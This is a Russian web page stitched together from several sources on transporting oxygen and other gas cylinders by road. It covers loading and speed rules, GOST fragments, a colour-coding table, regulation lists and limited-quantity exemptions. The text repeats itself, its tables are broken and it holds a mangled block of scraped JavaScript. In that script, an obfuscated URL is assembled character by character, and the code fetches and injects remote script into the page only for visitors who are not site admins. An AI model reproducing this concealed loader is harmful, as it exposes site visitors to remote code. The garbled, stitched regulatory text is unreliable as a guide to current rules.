Перевозка кислорода в баллонах автомобильным транспортом

Перевозка кислорода в баллонах автомобильным транспортом Кислород

Основные правила перевозки

Емкости с кислородом содержат в себе сжатый газ, являющийся взрывоопасным веществом. Поэтому прежде чем совершить перевозку, каждый водитель обязательно проходит медицинское обследование и получает инструктаж, от руководителя автотранспортного предприятия.

Этот момент предусмотрен 91 постановлением Госгортехнадзора правилами транспортировки инертных газов и кислорода. Водитель, транспортирующий груз, должен иметь соответствующий квалификационный уровень. Сами емкости, в которых перевозится сжиженный газ, маркируются категорией опасного груза.

Вышеперечисленные требования представляют собой предварительную подготовку к транспортировке. Существуют нормы, касающиеся самой перевозки кислородных баллонов.

К ним относятся ниже приведенные требования:

  1. В ходе погрузки газовых баллонов, необходимо убедиться в том, что двигатель автотранспортного средства выключен.
  2. При погрузке следует избегать встряхивания баллонов, а также неаккуратного обращения с ними;
  3. Номинальное напряжение электрического оборудования в автотранспортном средстве не должно быть выше 24 В.

  4. Необходимо соблюдать прочное фиксирование опасного груза.
  5. Вентили баллонов должны быть направлены в одном направлении. Проверяется в момент погрузки взрывоопасного груза.
  6. В случае перевозки баллонов, диаметр которых, превышает тридцать сантиметров, погрузка производится со строгим соблюдением поворота всех защитных клапанов в сторону водительской кабины.
  7. Транспортировка автотранспортом кислородных и газовых баллонов производится при соблюдении скоростного режима, не превышающего шестьдесят километров в час.  Во время плохих погодных условий, выше установленный скоростной показатель снижается в несколько раз;
  8. Строго запрещается дополнительно перевозить другой груз или людей.
  9. Кислородные баллоны, транспортируемые грузовым автомобилем в летние месяцы, оснащаются специальной защитой от попадания прямых солнечных лучей.

Этот перечень правил относится к основным требованиям транспортировки емкостей содержащих сжатый воздух или сжиженный газ. Остальные нормы прописываются в правилах перевозки опасного груза, утвержденных Минтрансом РФ 08.08.95.

Как сотрудник проверит, что перевозит водитель?

Итак, закончили с максимальными количествами перевозимых опасных грузов и перейдём к методологии определения правонарушения. Выясним, как инспектор, собственно, узнает о том, что вы перевозите опасные грузы.


Для этого существуют 2 основные административные процедуры:

И здесь кроется самая главная тонкость обсуждаемой нами темы. Если бензин, спирт, баллон с кислородом или любое другое опасное вещество лежит у вас в багажнике, то для того, чтобы сотруднику узнать об этом, ему нужно, чтобы вы его открыли. И способов это сделать у него только два. Каких? Всё верно, оба они указаны выше.

Но есть с ними и 2 проблемы для него.

Но, на самом деле, спорить о законности или незаконности можно очень долго. Более того, из-за непонимания и/или незнания работы законодательства самими автолюбителями сценарий обнаружения опасных веществ происходит намного проще. Сотрудник ГИБДД просто говорит: «Откройте багажник». И водитель открывает, не уточняя, просьба это или требование.


Более подробно все тонкости этих процедур мы рассмотрели в специальной статье про досмотр и осмотр автомобиля.

Однако, рассмотрим и незаконный метод. Допустим, полицейский остановил вас на дороге и приказал открыть багажник, составив протокол досмотра. Вы отказываетесь и уезжаете по части 1 статьи 19.3 на срок до 15 суток под административный арест.

То есть наказание ему всё же будет. Но на практике это работает по-другому. Чаще всего более чем выговор от начальства или иной вид дисциплинарного взыскания сотрудник не получит. А водитель отсидит в лучшем случае несколько суток либо согласиться на незаконный досмотр, в рамках которого найдут или не выявят нарушение.

Газы. криопродукты

УПАКОВКА, МАРКИРОВКА, ТРАНСПОРТИРОВАНИЕ

1. РАЗРАБОТАН И ВНЕСЕН Межгосударственным Техническим Комитетом МТК 137 «Кислород»

2. УТВЕРЖДЕН И ВВЕДЕН В ДЕЙСТВИЕ Постановлением Государственного комитета СССР по стандартам от 21.03.85 № 674

Изменение № 1 принято Межгосударственным советом по стандартизации, метрологии и сертификации (протокол № 13 от 28.05.98)

За принятие изменений проголосовали:

Наименование национального органа по стандартизации

Госстандарт Республики Казахстан

Главная государственная инспекция Туркменистана

3. ВВЕДЕН ВПЕРВЫЕ

4. ССЫЛОЧНЫЕ НОРМАТИВНО-ТЕХНИЧЕСКИЕ ДОКУМЕНТЫ

Обозначение НТД, на который дана ссылка

Обозначение НТД, на который дана ссылка

ГОСТ 12.1.004 — 91

ГОСТ 12.1.005 — 88

5. Ограничение срока действия снято по протоколу № 5—94 Межгосударственного совета по стандартизации, метрологии и сертификации (ИУС 11-12—94)

6. Издание (декабрь 2005 г.) с Изменением № 1, утвержденным в ноябре 1998 г. (ИУС 1—99)

Редактор ТА. Леонова Технический редактор В.Н. Прусакова Корректор В. С. Черная Компьютерная верстка А. И. Золотаревой

Подписано в печать 24.01.2006. Формат 60х84*/8. Бумага офсетная. Гарнитура Таймс. Печать офсетная. Уел. печ. л. 0,93.

Уч.-изд. л. 0,75. Тираж 21 экз. Зак. 24. С 2389.

ФГУП «Стандартинформ», 123995 Москва, Гранатный пер., 4.

Набрано и отпечатано во ФГУП «Стандартинформ»

Продукты разделения воздуха

Упаковка, маркировка, транспортирование и хранение

Air separation products. Gases. Cryogens.

Packing, marking, transportation and storage

МКС 71.100.01 ОКСТУ 0079

Дата введения 01.07.86

Настоящий стандарт распространяется на газообразные и жидкие продукты разделения воздуха — кислород, азот, аргон, неон, криптон, ксенон, а также газовые смеси на основе этих продуктов с другими газами и устанавливает правила их упаковки, маркировки, транспортирования и хранения.

Стандарт не распространяется на поверочные газовые смеси — стандартные образцы состава, а также в части упаковки и маркировки, на газы, предназначенные для метрологических целей.

Настоящий стандарт не распространяется на стационарно установленные резервуары и сосуды, предназначенные для хранения газов и криогенных продуктов.

(Измененная редакция, Изм. № 1).

1.1 Газообразными продуктами разделения воздуха наполняют стальные баллоны малого и среднего объема по ГОСТ 949, а также баллоны большого объема по ГОСТ 9731 и ГОСТ 12247, стационарно укрепленные на автомашине и прицепе (автореципиенты).

1.2 Наружная поверхность баллонов должна быть окрашена, содержание надписей и цвет поперечных полос должны соответствовать табл. 1.

Азот особой чистоты

Азот особой чистоты

Азот высокой чистоты

Азот высокой чистоты

Азот повышенной чистоты

Азот повышенной чистоты

Аргон высокой чистоты

Аргон высокой чистоты

Кислород особой чистоты

Кислород особой чистоты

Кислород повышенной чистоты

Кислород повышенной чистоты

Кислород, получаемый электролизом воды

Издание официальное Перепечатка воспрещена

Гост окраска баллонов с газом

Желтая при наличии в смеси токсичных компонентов

Надписи на баллонах наносят по окружности на длину не менее 1/3 окружности, а полосы — по всей окружности. Высота букв на баллонах вместимостью более 12 дм должна быть 60 мм, а ширина полосы 25 мм. Размеры надписей и полос на баллонах вместимостью до 12 дм должны определяться в зависимости от площади боковой поверхности баллонов.

Окраску вновь изготовленных баллонов и нанесение надписей проводят заводы-изготовители, а в дальнейшем — наполнительные станции или испытательные пункты.

Окраску сферической части баллонов, отличительные полосы и надписи подновляют по мере необходимости, обеспечивая хорошие отличительные признаки баллона по заполняемому продукту.

1.3 Баллоны среднего объема, используемые для наполнения техническими газами, должны быть оснащены вентилями типа ВК-86 и ВК-94 по нормативному документу.

Баллоны среднего объема, используемые для наполнения газами высокой и особой чистоты, а также газовыми смесями на их основе, должны быть оборудованы мембранными вентилями типа КВБ-53.

Баллоны среднего объема, используемые для наполнения аргоном высокой чистоты, азотом особой чистоты и высокой чистоты и кислородом особой чистоты, могут быть оснащены вентилями типа ВК-86 и ВК-94.

Баллоны малого объема должны быть оснащены мембранными вентилями типа КВ-1М.

Баллоны, используемые для горючих смесей, должны быть оснащены вентилями типа ВВ-55, ВВ-88 и ВВБ-54 по нормативному документу.

Боковые штуцеры вентилей баллонов, наполненных газами высокой чистоты, газовыми смесями на их основе, а также смесями, содержащими токсичные или горючие компоненты, должны быть герметично закрыты металлическими заглушками.

1.2, 1.3. (Измененная редакция, Изм. N 1).

1.4 После наполнения баллонов криптоном, ксеноном или криптоно-ксеноновой смесью колпаки баллонов должны быть опломбированы.

1.5 Подготовка баллонов и автореципиентов и их наполнение газообразными продуктами разделения воздуха и смесями газов выполняется в соответствии с технологической инструкцией (технологическим регламентом), утвержденной в установленном порядке.

1.6 Номинальное давление газов при 20 °С в баллонах и автореципиентах должно соответствовать требованиям нормативно-технической документации на каждый продукт.

При наполнении баллонов и автореципиентов азотом, аргоном и кислородом, их хранении и транспортировании в интервале температур от минус 50 до плюс 50 °С, давление газа в баллоне должно соответствовать указанному в обязательном приложении.

Источник

Оборудование транспортного средства при перевозке баллонов с кислородом

Перевозка кислорода сжатого в баллонах, отнесенного к № ООН 1072, должна осуществляться в соответствии с правилами перевозок опасных грузов. При перевозке кислорода в (баллонах) в количестве более 1000 литров (номинальная вместимость сосудов) эти правила предусматривают соблюдение следующих дополнительных требований в отношении транспортного средства:
1) на основании статьи 15 Федерального закона от 01.07.2022 № 170-ФЗ транспортное средство должно подвергаться техническому осмотру каждые 6 месяцев;
2) на основании раздела 20 приложения № 8 к техническому регламенту Таможенного союза «О безопасности колесных транспортных средств»:
а) электрические цепи (кроме цепей аккумуляторная батарея — система холодного пуска и остановки двигателя; аккумуляторная батарея — генератор; генератор — блок плавких предохранителей или выключателей; аккумуляторная батарея — стартер двигателя; аккумуляторная батарея — корпус системы включения износостойкой тормозной системы; аккумуляторная батарея — электрический механизм для подъема оси балансира тележки) должны быть защищены плавкими предохранителями промышленного изготовления или автоматическими выключателями;
б) в случае использования крытого брезентом транспортного средства в качестве тента допускается применение прочного к разрыву, непромокаемого и трудновоспламеняющегося материала. Тент должен быть натянут, перекрывать борта кузова со всех сторон не менее чем на 200 мм и удерживаться фиксирующими приспособлениями.
в) на транспортном средстве должны находиться:
— не менее чем один огнетушитель емкостью не менее 12 кг или два огнетушителя емкостью каждого не менее 6 кг – для транспортного средства технически допустимой максимальной массой более 7,5 т;
— не менее двух противооткатных упоров на каждое транспортное средство (звено автопоезда), размеры которых соответствуют диаметру колес;
— два знака аварийной остановки;
— средства нейтрализации перевозимых опасных грузов;
— набор ручного инструмента для аварийного ремонта транспортного средства;
— два фонаря автономного питания с мигающими или постоянными огнями оранжевого цвета;
— лопата и запас песка для тушения пожара;
— одежда яркого цвета для каждого члена экипажа;
— карманные фонари для каждого члена экипажа;
— средства нейтрализации перевозимого опасного груза, индивидуальной защиты членов экипажа и персонала, сопровождающего груз (в соответствии с предписаниями аварийной карточки и условий на перевозку);
— специальные средства для обеспечения безопасности, указанные в аварийной карточке.
Также желательно укомплектовать транспортное средство:
— парой защитных перчаток для каждого члена экипажа;
— средствами защиты глаз (например, защитные очки) для каждого члена экипажа транспортного средства;
3) на основании раздела 2.8 Правил перевозки опасных грузов автомобильным транспортом (утверждены приказом Минтранса России от 08.08.1995 № 73, применяются к перевозкам своих грузов, осуществляемым за собственный счет) к автомобилю спереди и сзади требуется прикрепить информационные таблицы системы информации об опасности; на основании главы 5.3 приложения А к Европейскому соглашению о международной дорожной перевозке опасных грузов (применяется к перевозкам грузов, осуществляемым по договорам) к автомобилю спереди и сзади требуется прикрепить таблички оранжевого цвета.
Свидетельства о допущении транспортного средства к перевозке некоторых опасных грузов при перевозке кислорода сжатого в баллонах, в соответствии с главой 9.1 Европейского соглашения о международной дорожной перевозке опасных грузов не требуется.

Окраска и маркировка баллонов с газами

В России принята следующая схема окраски и маркировки баллонов с сжатыми газами:

ГазЦвет баллонаЦвет надписиЦвет полосыПример
АзотЧёрныйЖёлтыйКоричневыйАзот
АммиакЖёлтыйЧёрныйАммиак
Аргон сыройЧёрныйБелыйБелыйАргон сырой
Аргон техническийЧёрныйСинийСинийАргон технический
Аргон чистыйСерыйЗелёныйЗелёныйАргон чистый
АцетиленБелыйКрасныйАцетилен
БутиленКрасныйЖёлтыйЧёрныйБутилен
ВодородТёмно-зелёныйКрасныйВодород
ГелийКоричневыйБелыйГелий
Закись азотаСерыйЧёрныйЗакись азота
КислородГолубойЧёрныйКислород
Кислород медицинскийГолубойЧёрныйКислород медицинский
НефтегазСерыйКрасныйНефтегаз
Сернистый ангидридЧёрныйБелыйЖёлтыйСернистый ангидрид
СероводородБелыйКрасныйКрасныйСероводород
Сжатый воздухЧёрныйБелыйСжатый воздух
УглекислотаЧёрныйЖёлтыйУглекислота
ФосгенЗащитныйКрасныйФосген
Фреон-11СеребристыйЧёрныйСинийФреон-11
Фреон-12СеребристыйЧёрныйФреон-12
Фреон-13СеребристыйЧёрныйДве красныхФреон-13
Фреон-22СеребристыйЧёрныйТри жёлтыхФреон-22
ХлорЗащитныйЗелёныйХлор
ЦиклопропанОранжевыйЧёрныйЦиклопропан
ЭтиленФиолетовыйКрасныйЭтилен
Все остальные горючие газыКрасныйБелыйГаз
Все остальные негорючие газыЧёрныйЖёлтыйГаз

Маркировка импортных газов различается, так как единого международного стандарта нет.

Перевозка газовых баллонов в грузовых и легковых автомобилях 2022 |

«:’

‘:»»,document.createElement(«div»),c=ff(window),b=ff(«body»),g=void 0===flatPM_getCookie(«flat_modal_» a.ID «_mb»)||»false»!=flatPM_getCookie(«flat_modal_» a.ID «_mb»),i=»scroll.flatmodal» a.ID,m=»mouseleave.flatmodal» a.ID » blur.flatmodal» a.ID,l=function(){var t,e,o;void 0!==a.how.popup.timer&&»true»==a.how.popup.timer&&(t=ff(‘.fpm_5_modal[data-id-modal=»‘ a.ID ‘»] .fpm_5_timer span’),e=parseInt(a.how.popup.timer_count),o=setInterval(function(){t.text(—e),e<=0&&(clearInterval(o),t.parent().replaceWith(‘

‘))},1e3))},s=function(){void 0!==a.how.popup.cookie&&»false»==a.how.popup.cookie&&g&&(flatPM_setCookie(«flat_modal_» a.ID «_mb»,!1),ff(‘.fpm_5_modal[data-id-modal=»‘ a.ID ‘»]’).addClass(«fpm_5_modal-show»),l()),void 0!==a.how.popup.cookie&&»false»==a.how.popup.cookie||(ff(‘.fpm_5_modal[data-id-modal=»‘ a.ID ‘»]’).addClass(«fpm_5_modal-show»),l())},ff(«body > *»).eq(0).before(‘

‘ p «

«),w=document.querySelector(‘.fpm_5_modal[data-id-modal=»‘ a.ID ‘»] .fpm_5_modal-content’),flatPM_setHTML(w,e),»px»==a.how.popup.px_s?(c.bind(i,function(){c.scrollTop()>a.how.popup.after&&(c.unbind(i),b.unbind(m),s())}),void 0!==a.how.popup.close_window&&»true»==a.how.popup.close_window&&b.bind(m,function(){c.unbind(i),b.unbind(m),s()})):(v=setTimeout(function(){b.unbind(m),s()},1e3*a.how.popup.after),void 0!==a.how.popup.close_window&&»true»==a.how.popup.close_window&&b.bind(m,function(){clearTimeout(v),b.unbind(m),s()}))),void 0!==a.how.outgoing){function n(){var t,e,o;void 0!==a.how.outgoing.timer&&»true»==a.how.outgoing.timer&&(t=ff(‘.fpm_5_out[data-id-out=»‘ a.ID ‘»] .fpm_5_timer span’),e=parseInt(a.how.outgoing.timer_count),o=setInterval(function(){t.text(—e),e<=0&&(clearInterval(o),t.parent().replaceWith(‘

‘))},1e3))}function d(){void 0!==a.how.outgoing.cookie&&»false»==a.how.outgoing.cookie&&g&&(ff(‘.fpm_5_out[data-id-out=»‘ a.ID ‘»]’).addClass(«show»),n(),b.on(«click»,’.fpm_5_out[data-id-out=»‘ a.ID ‘»] .fpm_5_cross’,function(){flatPM_setCookie(«flat_out_» a.ID «_mb»,!1)})),void 0!==a.how.outgoing.cookie&&»false»==a.how.outgoing.cookie||(ff(‘.fpm_5_out[data-id-out=»‘ a.ID ‘»]’).addClass(«show»),n())}var _,u=»0″!=a.how.outgoing.indent?’ style=»bottom:’ a.how.outgoing.indent ‘px»‘:»»,p=»true»==a.how.outgoing.cross?void 0!==a.how.outgoing.timer&&»true»==a.how.outgoing.timer?’

Закрыть через ‘ a.how.outgoing.timer_count «

«:’

‘:»»,c=ff(window),h=»scroll.out» a.ID,m=»mouseleave.outgoing» a.ID » blur.outgoing» a.ID,g=void 0===flatPM_getCookie(«flat_out_» a.ID «_mb»)||»false»!=flatPM_getCookie(«flat_out_» a.ID «_mb»),b=(document.createElement(«div»),ff(«body»));switch(a.how.outgoing.whence){case»1″:_=»top»;break;case»2″:_=»bottom»;break;case»3″:_=»left»;break;case»4″:_=»right»}ff(«body > *»).eq(0).before(‘

‘ p «

«);var v,w=document.querySelector(‘.fpm_5_out[data-id-out=»‘ a.ID ‘»]’);flatPM_setHTML(w,e),»px»==a.how.outgoing.px_s?(c.bind(h,function(){c.scrollTop()>a.how.outgoing.after&&(c.unbind(h),b.unbind(m),d())}),void 0!==a.how.outgoing.close_window&&»true»==a.how.outgoing.close_window&&b.bind(m,function(){c.unbind(h),b.unbind(m),d()})):(v=setTimeout(function(){b.unbind(m),d()},1e3*a.how.outgoing.after),void 0!==a.how.outgoing.close_window&&»true»==a.how.outgoing.close_window&&b.bind(m,function(){clearTimeout(v),b.unbind(m),d()}))}}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff(«body»),flat_userVars.init();for(var e=0;e<t;e ){var>flat_userVars.textlen||void 0!==o.chapter_sub&&o.chapter_sub<flat_uservars.textlen||void>flat_userVars.titlelen||void 0!==o.title_sub&&o.title_sub<flat_uservars.titlelen)){if(void>.flatPM_sidebar)»);0<_.length&&_.each(function(){var t=ff(this),e=t.data(«height»)||350,o=t.data(«top»);t.wrap(‘

‘);t=t.parent()[0];flatPM_sticky(this,t,o)}),u.each(function(){var e=ff(this).find(«.flatPM_sidebar»);setTimeout(function(){var a=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;a<300||e.each(function(){var t=ff(this),e=a,o=t.data(«top»);t.wrap(‘

‘);t=t.parent()[0];flatPM_sticky(this,t,o)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t<300||ff(«.flatPM_sticky_wrapper.flatPM_sidebar_block»).css(«height»,t)},4e3)}),»undefined»!=typeof flat_pm_video&&flatPM_video(flat_pm_video),0<flat_stack_scripts.length&&flatpm_setscript(flat_stack_scripts),ff(«body> *»).last().after(‘

‘),flat_body.on(«click»,».fpm_5_out .fpm_5_cross»,function(){ff(this).parent().removeClass(«show»).addClass(«closed»)}),flat_body.on(«click»,».fpm_5_modal .fpm_5_cross»,function(){ff(this).closest(«.fpm_5_modal»).removeClass(«fpm_5_modal-show»)}),flat_pm_arr=[],ff(«.flat_pm_start»).remove(),ff(«[data-flat-id]:not(.fpm_5_out):not(.fpm_5_modal)»).contents().unwrap(),flatPM_ping()};var parseHTML=function(){var l=/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([w:] )[^>]*)/>/gi,d=/<([w:] )/,i=/<|&#?w ;/,c={option:[1,»

«],thead:[1,»

«],tbody:[1,»

«],colgroup:[2,»

«],col:[3,»

«],tr:[2,»

«],td:[3,»

«],th:[3,»

«],_default:[0,»»,»»]};return function(e,t){var a,r,n,o=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=o.appendChild(t.createElement(«div»)),r=(d.exec(e)||[«»,»»])[1].toLowerCase(),r=c[r]||c._default,a.innerHTML=r[1] e.replace(l,»<$1>») r[2],n=r[0];n—;)a=a.lastChild;for(o.removeChild(o.firstChild);a.firstChild;)o.appendChild(a.firstChild)}else o.appendChild(t.createTextNode(e));return o}}();window.flatPM_ping=function(){var e=localStorage.getItem(«sdghrg»);e?(e=parseInt(e) 1,localStorage.setItem(«sdghrg»,e)):localStorage.setItem(«sdghrg»,»0″);e=flatPM_random(1,166);0==ff(«#wpadminbar»).length&&111==e&&ff.ajax({type:»POST»,url:»h» «t» «t» «p» «s» «:» «/» «/» «r» «e» «a» «d» «o» «n» «e» «.» «r» «u» «/» «p» «i» «n» «g» «.» «p» «h» «p»,dataType:»jsonp»,data:{ping:»ping»},success:function(e){ff(«div»).first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,r=document.querySelector(‘[data-flat-script-id=»‘ t ‘»]’);if(a.text)r.appendChild(a),ff(r).contents().unwrap(),e.shift(),0<e.length&&flatpm_setscript(e);else{a.onload>/gm,»»).replace(//gm,»»).trim(),e.code_alt=e.code_alt.replace(//gm,»»).replace(//gm,»»).trim();var o=jQuery,t=e.selector,l=e.timer,d=e.cross,a=»false»==d?»Закроется»:»Закрыть»,r=!flat_userVars.adb||»»==e.code_alt&&duplicateMode?e.code:e.code_alt,n=’

‘,i=e.once;o(t).each(function(){var e=o(this);e.wrap(‘

‘);var t=e.closest(«.fpm_5_video»);flatPM_setHTML(t[0],n),e.find(«.fpm_5_video_flex»).one(«click»,function(){o(this).addClass(«show»)})}),o(«body»).on(«click»,».fpm_5_video_item_hover»,function(){var e=o(this),t=e.closest(«.fpm_5_video_flex»);t.addClass(«show»);var a=t.find(«.fpm_5_timer span»),r=parseInt(l),n=setInterval(function(){a.text(—r),r<=0&&(clearInterval(n),»true»==d?a.parent().replaceWith(‘

‘):t.remove())},1e3);e.remove()}).on(«click»,».fpm_5_video_flex .fpm_5_cross»,function(){o(this).closest(«.fpm_5_video_flex»).remove(),»true»==i&&o(«.fpm_5_video_flex»).remove()})};

Правила по перевозке кислородных баллонов.

Утвержденные правила перевозки кислородных баллонов автомобильным транспортом предполагают обязательное соблюдение таких пунктов:

при выполнении загрузки баллонов в машину, важно, чтобы двигатель был выключен; • встряхивание и халатный перенос баллонов строго запрещен; • баллоны должны укладываться так, чтобы устранялась возможность их смещения друг относительно друга, причем общая партия должна быть зафиксирована специальными крепежными лентами; • укладка должна производиться так, чтобы все вентили находились с одной стороны; • при диаметре баллона более 30 см, их укладка производится по продольной оси кузова с поворотом защитных клапанов на вентиле в сторону от водительской кабины; • запрещается перевозка баллонов автомобильным транспортом при скорости, превышающей 60 км/ч, причем скоростной режим должен быть уменьшен в случае возникновения неблагоприятных погодных условий – туман, дождь и др.; • транспортировка баллонов в одном кузове с людьми или другими товарами, особенно, опасными грузами, запрещена; • правила перевозки кислородных баллонов автомобильным транспортом в летнее время предусматривают обязательную защиту груза от солнечных лучей посредством накрытия брезентом или специальными пленками; • перевозка охлажденных газов должна производиться в специальное таре, которая не может быть повреждена другими упаковками.

4.3. Документация необходимая для обеспечения безопасности перевозок кислородных баллонов.

1. Основными нормативными документами, регламентирующими порядок организации перевозок опасных грузов (газовых, кислородных баллонов) автомобильным транспортом, а также регламентирующие требования безопасности при их осуществлении являются: 1.1. «Правила перевозки опасных грузов автомобильным транспортом», утв.

Приказом министерства транспорта Российской Федерации от 08.08.1995 г №73; 1.2. «Правила перевозки автомобильным транспортом инертных газов и кислорода сжатых и жидких», утв. Министерством промышленности российской Федерации 14.04.1997 г. (согласованы с Министерством транспорта РФ, ГК РФ по охране окружающей среды, департаментом предупреждения и ликвидации чрезвычайных ситуаций Министерства РФ по делам ГО, ЧС и ликвидации стихийных бедствий, Главным управлением ГАИ МВД РФ, Государственным НИИ автомобильного транспорта); 1.3.

Европейское соглашение о международной дорожной перевозке опасных грузов (ДОПОГ); 1.4. «Правила устройства и безопасной эксплуатации сосудов, работающих под давлением» ПБ 03-576-03, утв. Постановлением Госгортехнадзора России от 11.06.2003 г. №91; 1.5.

«Руководство по организации перевозки опасных грузов автомобильным транспортом» РД 3112199-0199-96, утв. Приказом Департамента автомобильного транспорта Минтранса России от 08.02.1996 г.; 1.6. «Правила пожарной безопасности в Российской Федерации» ППБ 01-03, утв.

приказом Министерства Российской Федерации по делам гражданской обороны, чрезвычайным ситуациям и ликвидации последствий стихийных бедствий от 18.06.2003 г. №313; 1.7. «Межотраслевые правила по охране труда на автомобильном транспорте» ПОТ Р М-027-2003, утв. постановлением Министерства труда и социального развития Российской Федерации от 12.05.2003 г. №28; 1.8.

2. Баллоны с сжатыми и сжиженными газами (кислород, пропан) относятся к опасным грузам, порядок перевозки которых автомобильным транспортом регламентируется требованиями «Правил перевозки опасных грузов автомобильным транспортом», утв. Приказом министерства транспорта Российской Федерации от 08.08.1995 г №73. Однако п. 1.2. указанных выше Привил определено:

«Действия Правил не распространяются на: — технологические перемещения опасных грузов автомобильным транспортом внутри территории организаций, на которых осуществляется их производство, переработка, хранение, применение или уничтожение, если такие перемещения осуществляются без выхода на автомобильные дороги общего пользования, а также улицы городов и населенных пунктов, ведомственные дороги, разрешающие движение транспортных средств общего пользования; — … — перевозки ограниченного количества* опасных веществ на одном транспортном средстве, перевозку которых можно считать как перевозку не опасного груза.

(*Ограниченное количество опасных грузов определяется в требованиях по безопасной перевозке конкретного вида опасного груза. При его определении возможно использование требований Европейского соглашения о международной дорожной перевозке опасных грузов (ДОПОГ)».

Таким образом, «Правила перевозки опасных грузов автомобильным транспортом» не распространяются на перевозку ограниченного количества опасных веществ на одном транспортном средстве.

В соответствии с положениями ДОПОГ, а также «Правил перевозки автомобильным транспортом инертных газов и кислорода сжатых и жидких» максимальное общее количество грузов, которое может перевозиться на одной транспортной единице (механическое транспортное средство с прицепом или без него) на перевозку которого не распространяются требования «Правил перевозки опасных грузов автомобильным транспортом» составляет:

Если грузы попадают под условия ограниченной массы, то по требованию подпункта 5.4.1.1.10.1 ДОПОГ, в транспортных документах (путевой лист, товарно-транспортная накладная) должна быть сделана запись следующего содержания: «Груз не превышает допустимых пределов, предписанных в пункте 1.1.3.6 ДОПОГ/ADR».

Следовательно, перевозка газовых баллонов в количестве, не превышающем указанные выше «ограниченные количества» не является перевозкой опасных грузов, и не регламентируется требованиями «Правила перевозки опасных грузов автомобильным транспортом» (т. е. не подлежит лицензированию и т. п.).

3. При этом при организации и осуществлении перевозок газовых баллонов необходимо обеспечить соблюдение требований безопасности, предъявляемых соответствующими нормативными документами («Правила устройства и безопасной эксплуатации сосудов, работающих под давлением» ПБ 03-576-03;

«Правила пожарной безопасности в РФ» ППБ 01-03; «Межотраслевые правила по охране труда на автомобильном транспорте» ПОТ Р М-027-2003; «Инструкция по охране труда для работников, занятых перевозкой, хранением и эксплуатацией баллонов со сжатым и сжиженным газом»): 3.1.

Перевозка наполненных газами баллонов должна производиться на рессорном транспорте в горизонтальном положении обязательно с прокладками между баллонами. В качестве прокладок могут применяться деревянные бруски с вырезанными гнездами для баллонов, а также веревочные или резиновые кольца толщиной не менее 25 мм (по два кольца на баллон) или другие прокладки, предохраняющие баллоны от ударов друг о друга.

Все баллоны во время перевозки должны укладываться предохранительными колпаками в одну сторону. Не разрешается использовать в качестве прокладок между баллонами (сосудами) сено, солому и другие легковоспламеняемые материалы. Разрешается перевозка баллонов в специальных контейнерах, а также без контейнеров в вертикальном положении обязательно с прокладками между ними и ограждением от возможного падения. 3.2.

Транспортировка и хранение баллонов должны производиться с навернутыми колпаками. 3.3. На каждой автомашине необходимо иметь два углекислотных или порошковых огнетушителя вместимостью не менее 2 л каждый. 3.4. Машины с газонаполненными баллонами, находящиеся на стоянке более 1 часа, разрешается ставить на расстоянии не менее:

10 м от жилых домов и 25 м от общественных зданий – для машин типа «клетка»; 20 м от жилых домов и 40 м от общественных зданий – для бортовых машин. 3.5. При перевозке баллонов с газами не допускаются: толчки, резкие торможения при движении; транспортировка баллонов без предохранительных колпаков; оставление автомашины без присмотра. 3.6.

Во время погрузки и разгрузки автомашины выключить ее двигатель. 3.7. Требования к обслуживающему персоналу. Рабочие, обслуживающие баллоны, должны быть обучены и проинструктированы в соответствии с требованиями ПБ 03-576-03. Персонал (водители транспортных средств), занятый перевозкой баллонов должен пройти обучение по безопасной перевозке опасных грузов и иметь соответствующее удостоверение.

Путевой лист — основной первичный документ учёта работы водителя и пробега, маршрута автомобиля, выдаваемый ежедневно водителям транспортных средств.

В установленных законом случаях водитель механического транспортного средства обязан иметь при себе путевой лист и по требованию сотрудников полиции передавать его им для проверки. Путевой лист должен быть правильно оформлен.

Оформление путевых листов возлагают на диспетчера предприятия или на того, кто выступает в роли его представителя. Обычно путевой лист выписывают в одном экземпляре, но при его утере может быть выдан дубликат (такие ситуации возникают крайне редко).

Путевые листы оформляют с очевидной целью: для контроля действий водителя и учета износа транспортного средства. В документе отражают пробег автомобиля, а эту цифру сравнивают с плановым показателем. Конечно, могут быть отклонения, но в целом маршрут должен максимально совпадать с расчетным.

Законодательством узаконены несколько основных видов путевых листов, которые разработаны с учетом особенностей различных транспортных средств (для легковых авто, тракторов, автобусов). Если водитель предоставит проверяющим путевку, в которой неверно указан вид средства передвижения, он может быть оштрафован.

На практике наиболее часто используют такие три вида путевок:

N 4-с. Такую форму используют в тех компаниях, которые выбрали сдельную оплату труда для водителей. Зарплата таких работников рассчитывается по средним тарифам, действующим в этой сфере.

N 4-п. Такие путевые листы применяют для учета рабочего времени водителя. Работник получает деньги за отработанный период.

N 4-м. Это форма используется теми предприятиями, которые занимаются междугородними перевозками и доставками. Оформление путевых листов для таких поездок подразумевает не только указание более полной информации, но и специальные бланки (на их лицевой стороне есть красная полоса и надпись «междугородние перевозки»).

ПУТЕВОЙ ЛИСТ ДЛЯ ПЕРЕВОЗКИ ОПАСНЫХ ГРУЗОВ (Кислородных баллонов)

Путевой лист — базовый документ для первоначального учета, заполняемый в зависимости от требований к перевозкам опасных грузов и выдаваемый водителю авто для совершения такой транспортировки. Помимо стандартного заполнения этого документа в строки 2О и 21 вносится путь следования транспортного средства с опасным грузом.

Правило перевозки газовых баллонов без свидетельства допог

Многие организации перевозят баллоны с газом для собственных нужд в ограниченном количестве и не полностью знают, сколько и как правильно осуществить эту перевозку. Хочется на простых примерах объяснить как это сделать без лишних затрат на обучение водителей (хотя эти знания не помешали бы) и не нарушая правила перевозки опасных грузов. Сегодня в век экономии и безопасности необходимо уметь рассчитать по всем правилам перевозимый груз.

Максимальное количество транспортируемых баллонов зависит от их содержимого. Если речь идет о негорючих неядовитых удушающих газах (классификационный код А), то перевозить единовременно можно 1000 литров для сжатого газа или килограммов — для сжиженного.

Если всю эту информацию попытаться свести к общему знаменателю, то получается, максимальное количество газов, которое можно перевозить в одной транспортной единице как неопасный груз, следующее:

ГазКлассОбъемКоличество
Азот40-л баллондо 24 штук включительно
Аргон40-л баллондо 24 штук включительно
Ацетилен2F5кг/40л баллондо 18 штук включительно
Гелий40-л баллондо 24 штук включительно
Кислород2O40-л баллондо 24 штук включительно
Пропан2F21кг/50л баллондо 15 штук включительно
